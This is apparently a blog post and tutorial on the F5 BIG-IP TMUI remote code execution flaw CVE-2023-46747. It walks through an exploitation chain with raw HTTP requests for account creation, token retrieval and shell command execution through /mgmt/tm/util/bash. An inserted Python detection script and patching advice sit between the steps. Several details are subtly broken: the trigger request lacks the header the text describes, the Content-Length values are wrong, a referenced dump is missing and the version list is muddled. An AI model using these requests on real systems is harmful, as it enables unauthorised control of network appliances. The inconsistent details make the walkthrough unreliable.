Unpacking F5 BIG-IP Remote Code Execution Vulnerability: CVE-2023-46747

In the world of cybersecurity, staying ahead of potential threats is crucial.

One such threat that has recently emerged is the F5 BIG-IP Remote Code Execution Vulnerability, also known as CVE-2023-46747.

This vulnerability poses a significant risk for organizations worldwide, particularly those using F5’s BIG-IP devices for network and application traffic management.

The vulnerability can allow unauthorized remote attackers to execute arbitrary code on the exposed Traffic Management User Interface (TMUI) of these devices.

This blog post aims to shed light on CVE-2023-46747, explaining its nature, potential impact, and the necessary steps to mitigate its risks.

Guide to F5 BIG-IP Remote Code Execution Vulnerability (CVE-2023-46747)

The F5 BIG-IP Remote Code Execution Vulnerability (CVE-2023-46747) is a serious security flaw that allows unauthorized remote attackers to execute arbitrary code on the exposed Traffic Management User Interface (TMUI) of F5 BIG-IP instances.

This guide provides an easy-to-follow tutorial on how to understand and potentially exploit this vulnerability.

Understanding the Vulnerability

The F5 BIG-IP Remote Code Execution Vulnerability (CVE-2023-46747) permits unauthenticated remote attackers to gain access to the BIG-IP system via the management port or a self IP address.

This vulnerability may allow the bypassing of authentication, leading to the execution of arbitrary code on F5 BIG-IP instances with an exposed TMUI.

Affected Versions

Here are the versions of F5 BIG-IP that are affected by this vulnerability:

    All versions of F5 BIG-IP up to and including 17.1.0
    F5 BIG-IP versions from 16.1.0 through 16.1.4
    F5 BIG-IP versions from 15.1.0 through 15.1.10
    F5 BIG-IP versions from 14.1.0 through 14.1.5
    F5 BIG-IP versions from 13.1.0 through 13.1.5

Setting Up the Environment

You can download the environment from F5. Simply download the BIGIP-15.1.8-0.0.7.ALL-vmware.ova file and open it using VMware.

To reset the web password, enter the tmsh shell and run:

modify auth user admin password admin

Exploiting the Vulnerability

Step 1: Send a Request to the TMUI Module

The F5 BIG-IP TMUI Remote Code Execution vulnerability can be triggered when a specific HTTP request is sent to the login page of the F5 BIG-IP’s Traffic Management User Interface (TMUI).

The vulnerability is triggered when a request containing a “Transfer-Encoding” header with a value similar to “xxx, chunked” is sent to the F5 BIG-IP TMUI module (for example, the login page /tmui/login.jsp).

When a POST request is made to the /tmui/login.jsp endpoint of the F5 BIG-IP server with the aforementioned headers and body content, the vulnerability is activated.

This is an example of how such a request might look:

POST /tmui/login.jsp HTTP/1.1
Host: 192.168.127.146
Content-Type: application/x-www-form-urlencoded

&name=admin&name_before=&passwd=admin789456

The parameters name=admin and passwd=admin789456 are used to create a new account on the system.

Following the POST request, the server responds with a 204 No Content status code, indicating that the server has successfully fulfilled the request and there is no additional content to send in the response payload body.

The rest of the data provided appears to be part of a hexadecimal dump of the HTTP response, which includes metadata about the request.
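A defender-side check for the trigger described in Step 1, as an added example that is not from the original post or from F5. It assumes raw HTTP request text (for example from a packet capture or a reverse-proxy header log) and constructs its own sample requests:

```python
"""Detection helper (added example, not from the original post or from F5):
flags HTTP requests that carry the Transfer-Encoding anomaly the text
describes ("xxx, chunked") against TMUI paths. Input is raw request text,
e.g. extracted from a packet capture or a reverse-proxy header log."""
from typing import NamedTuple


class Finding(NamedTuple):
    path: str
    reason: str


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body).
    Header names are lower-cased; repeated headers are kept as a list."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: dict[str, list[str]] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return method, path, headers, body


def check_request(raw: str) -> list[Finding]:
    """Return findings for one request; an empty list means nothing suspicious."""
    _method, path, headers, _body = parse_request(raw)
    findings: list[Finding] = []
    if not path.startswith("/tmui/"):
        return findings  # only Configuration utility paths are in scope here
    te_values = headers.get("transfer-encoding", [])
    codings = [t.strip().lower() for v in te_values for t in v.split(",")]
    if codings and codings != ["chunked"]:
        # "xxx, chunked": an unknown coding placed before chunked, as in the post
        findings.append(Finding(path, f"non-standard Transfer-Encoding {te_values}"))
    if te_values and "content-length" in headers:
        # RFC 7230 says Transfer-Encoding wins, but parsers that disagree are
        # exactly how request smuggling starts
        findings.append(Finding(path, "Transfer-Encoding and Content-Length both present"))
    return findings


# Constructed sample traffic (not real captures).
BENIGN = ("POST /tmui/login.jsp HTTP/1.1\r\nHost: bigip.example\r\n"
          "Content-Type: application/x-www-form-urlencoded\r\n"
          "Content-Length: 28\r\n\r\nusername=admin&passwd=secret")
SUSPECT = ("POST /tmui/login.jsp HTTP/1.1\r\nHost: bigip.example\r\n"
           "Transfer-Encoding: xxx, chunked\r\nContent-Length: 5\r\n\r\n0\r\n\r\n")
```

Run `check_request` over each request in your capture; any non-empty result against a TMUI path is worth correlating with new local accounts and iControl REST logins that follow it.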

Step 2: Obtain the User Token

Send the following request to obtain an authentication token:

POST /mgmt/shared/authn/login HTTP/1.1
Host: 192.168.127.146
Content-Length: 22
Content-Type: application/x-www-form-urlencoded

{"username":"admin", "password":"admin789456"}

Step 3: Execute Commands

Place the obtained token in the X-F5-Auth-Token header, then execute commands through /mgmt/tm/util/bash:

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.127.146
Connection: keep-alive
Content-Length: 22
X-F5-Auth-Token:ICGZXJJROASFRPWYZF3EAQFCGN

{"command":"run","utilCmdArgs":"-c whoami"}

That’s it! You’ve now got a basic understanding of CVE-2023-46747 and how it can be exploited.

Securing F5 BIG-IP Devices from Vulnerabilities

F5 BIG-IP devices, widely used by governments, internet service providers, telecom companies, cloud service providers, and other large enterprises globally for network and application traffic management, have been exposed to vulnerabilities.

Administrators are encouraged to apply the hotfixes provided by F5 as an immediate measure. These hotfixes serve as temporary solutions until software releases with permanent fixes are available.

The vulnerability, known as CVE-2023-46747, is only exploitable if the Traffic Management User Interface (TMUI), also known as the Configuration utility, is accessible via the internet.

To mitigate this risk temporarily, administrators can restrict access to the Configuration utility to trusted networks or devices, or to specific IP ranges.

It’s worth noting that the TMUI portal should not be publicly accessible via the internet.

Over the past three years, there have been three unauthenticated remote code execution vulnerabilities within the TMUI portal, including CVE-2023-46747.

If access is required, it’s recommended to ensure the TMUI portal is only reachable from the internal network or through a VPN connection.

Conclusion

The cybersecurity landscape is ever-evolving, and the emergence of vulnerabilities like CVE-2023-46747 underscores the importance of staying vigilant and proactive in addressing potential threats.

While the vulnerability presents serious risks, it’s reassuring to know that there are effective measures available to mitigate these risks.

By implementing the recommended hotfixes and restricting access to the TMUI, organizations can protect their F5 BIG-IP devices from this vulnerability.